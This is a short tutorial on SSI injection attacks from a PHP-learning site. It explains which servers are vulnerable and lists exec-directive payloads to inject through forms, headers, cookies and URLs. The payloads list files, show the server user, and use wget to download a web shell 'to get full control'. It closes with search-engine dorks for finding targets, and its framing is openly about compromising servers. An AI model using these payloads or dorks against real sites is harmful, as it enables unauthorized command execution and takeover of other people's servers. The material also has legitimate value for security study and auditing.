网站地图    收藏   

主页 > 后端 > 网站安全 >

SSI注入讲解 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 1- What is It?A Server Side Include Attack is an Extremely Useful attack for executing commands on the server. You need basic knowledge of Bash or Batch to know what ......

1- What is It?
 
A Server Side Include Attack is an Extremely Useful attack for executing commands on the server. You need basic knowledge of Bash or Batch to know what commands could help compromise the server to do this.
 
2- What Sites are Vulnerable?
 
For a site to be vulnerable to SSI Injection, Apache needs Server Side Includes aloud in the config file or the file extention must end in ‘.shtml’ ‘.shtm’ or ‘.stm’ both Apache, lighthttpd and IIS support SSI.
 
3- Testing for SSI Injection
 
To audit a site to check if it is vulnerable to SSI Injection you search all the directories for ‘.shtml’ ‘.shtm’ or ‘.stm’ extentions, if you find any then its probably enabled, if you dont find any it still may be enabled. It effects pages with unsanitized requests, (eg no filters, filtering < !–#exec …–>) To test you enter the following command into the request
 
< !–#exec cmd=”ls” –>
 
If you get a filesystem output appear then it is vulnerable, if the server is Windows replace the ‘ls’ for ‘dir’
You test for SSI the same way as XSS, you can post the command into
- Textboxes/search boxes
- Headers
- Cookies
- Address Bar
 
4- Useful Commands
 
-Show Files Linux www.2cto.com
 
< !–#exec cmd=”ls” –>
 
-Show Files Windows
 
< !–#exec cmd=”dir” –>
 
-Read /etc/passwd
 
 
 
-What User Is the webserver running on
 
< !–#exec cmd=”whoami” –>
 
-Download a shell to the server to get full control
 
< !–#exec cmd=”wget “shell.php”” –>
 
5- Dorks
 
Simillar to SQLi dorks, they get a list of sites that may or may not be vulnerable to SSI Injection
inurl:index.shtml
inurl:index.shtm
inurl:index.stm
Theres a few to start you off, but it is easy as pie to think of your own.

摘自 http://hi.baidu.com/evilrapper/blog/item/743d884e13a465d4d0c86a76.html

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论